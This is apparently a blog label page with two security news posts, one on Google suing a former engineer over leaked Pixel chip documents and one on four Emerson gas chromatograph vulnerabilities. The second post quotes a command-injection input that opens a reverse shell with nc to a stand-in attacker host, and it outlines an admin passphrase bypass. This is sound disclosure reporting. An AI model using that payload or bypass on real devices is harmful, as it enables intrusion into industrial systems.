Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label sensitive data exposure. Show all posts
sensitive data exposure
Confidential Data Cyber Crime data security Data Theft Google Google Pixel Lawsuit sensitive data exposure

Google Sues Ex-Employee for Leaking Pixel Chip Trade Secrets Online

 


Google has filed a lawsuit against Harshit Roy, a former employee, accusing him of leaking sensitive information about the company's chip designs. The lawsuit, filed in a Texas federal court, alleges that Roy, who worked as an engineer at Google from 2020 to 2024, disclosed confidential details about Pixel processing chips on social media platforms, including X (formerly Twitter) and LinkedIn. 
 
According to the complaint, Roy captured internal documents containing proprietary chip specifications before resigning in February 2024. After leaving Google, he moved from Bangalore, India, to Austin, Texas, to pursue a doctoral program at the University of Texas. 
 

The lawsuit claims that Roy:   

 
- Shared these confidential documents publicly, violating his confidentiality agreement with Google.  
- Posted statements such as, “Don’t expect me to adhere to any confidentiality agreement,” and “Empires fall, and so will you,” along with images of internal documents.   
- Ignored multiple takedown requests from Google and continued posting proprietary information online.  
- Tagged competitors like Apple and Qualcomm in some of his posts, allegedly drawing attention to the leaked information. 
 
Google asserts that the leaked materials contained trade secrets critical to its operations. The disclosures reportedly led to media outlets publishing stories based on the leaked information, further exacerbating the breach. 
 
Jose Castaneda, a spokesperson for Google, emphasized the company's commitment to addressing the situation. “We discovered that this former employee unlawfully disclosed numerous confidential documents. We are pursuing legal action to address these unauthorized disclosures, as such behavior is completely unacceptable,” Castaneda stated. 
 

Google is seeking:   

 
  • Monetary damages to compensate for the breach.   
  • A court order to prevent Roy from further distributing or using the leaked information. 

As part of the legal proceedings, a judge issued a temporary restraining order on Wednesday, prohibiting Roy from sharing additional proprietary details. Google argues that such measures are necessary to:   
 
  • Protect its intellectual property.   
  • Maintain trust within its operations. 
 
This case highlights the ongoing challenges faced by companies in safeguarding trade secrets, especially in highly competitive industries like technology. As the legal battle unfolds, it is expected to shed light on the legal and ethical boundaries of confidentiality agreements and the potential consequences of breaching such agreements in the tech industry.
Read more »
sensitive data exposure
Authentication Bypass Command Injection Data Breach denial-of-service conditions Emerson gas chromatographs vulnerabilities sensitive data exposure

Critical Vulnerabilities in Emerson Gas Chromatographs Expose Sensitive Data

 

Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands. 

Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.

Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.

The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command implementation. This flaw is tied to a system function that calls a constructed shell command with a user-provided file name without proper sanitization, allowing an attacker to inject arbitrary shell commands.

An attacker could exploit this by supplying crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.

The second vulnerability, CVE-2023-51761, is an authentication bypass that enables an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password. The passphrase, derived from the device's MAC address, can be easily obtained. By understanding the passphrase validation process, an attacker can generate the passphrase using the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.

The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.

Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.
Read more »
Subscribe to: Posts (Atom)